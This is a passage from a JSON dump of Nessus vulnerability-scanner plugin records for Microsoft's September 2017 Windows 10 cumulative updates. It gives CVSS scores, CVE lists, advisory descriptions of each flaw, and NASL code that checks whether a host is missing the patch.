(CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": 
"SMB_NT_MS17_SEP_4038783.NASL", "href": "https://www.tenable.com/plugins/nessus/103129", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103129);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. 
An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.\n (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. 
\n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038783/windows-10-update-kb4038783\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?15cd901b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038783.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038783');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038783])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:02", "description": "The 
remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. 
The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. 
An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. 
If the current user is logged on with administrative user rights, an attacker could take control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system.\n (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711, CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. 
The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system.\n (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. 
(CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8704", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8711", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8731", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8752", "CVE-2017-8753", 
"CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038782.NASL", "href": "https://www.tenable.com/plugins/nessus/103128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103128);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8704\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8711\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8731\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n 
